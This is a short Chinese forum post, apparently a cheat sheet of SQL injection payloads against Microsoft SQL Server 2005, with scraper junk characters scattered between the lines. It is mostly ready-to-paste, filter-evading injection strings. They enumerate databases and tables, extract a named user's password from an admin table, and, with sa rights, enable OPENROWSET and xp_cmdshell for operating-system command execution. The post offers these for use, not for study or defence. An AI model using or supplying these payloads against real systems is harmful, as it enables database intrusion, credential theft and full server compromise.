MSsql2005注入语句

admin

/ m" f1 E" z$ {+ }

% a$ U: r6 R( B, S[Copy to clipboard]CODE:
! b1 y" L$ C: M/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

! ^4 ?) z! C7 G/ L  G; o, m  h爆表语句,somedb部份是所要列的数据库，红色数字1累加


& m8 N4 ~. a' p; i[Copy to clipboard]CODE:
. u/ v0 w5 U# d3 J: o7 \8 K7 @, S, |9 i. h/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
& v0 x: I* \- |. Z. Q
爆字段语句，爆表admin里user='icerover'的密码段


[Copy to clipboard]CODE:
# ^* T# n7 @8 J- a5 a5 w**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

8 J' l" o$ W, [5 L/ a6 N. _5 Jmssql2005默认没有开xp_cmdshell的，openrowset也不能用
" M* R( `! J* J9 v9 }) |! |6 v如果是sa权限，可以这样来开启
开启openrowset
# D) y3 m1 m; t, h2 {
& b9 V" U" A5 X7 @! x! M) X( }
[Copy to clipboard]CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
( s0 c/ l3 V; e3 g/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
5 T- G' I& U" }+ @+ b
) @0 k5 i0 @1 Y开启xp_cmdshell
/ P; M: J1 r4 v6 i" M2 B/ H

+ s" V) }5 ~( i0 e$ \* z& ][Copy to clipboard]CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
' p- q  \/ @; E9 \! _+ |( p4 k* eEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

( P% z  w- |* K& V( B* ~4 {4 Dok,over~~晚安
- _+ `7 L0 z) N* a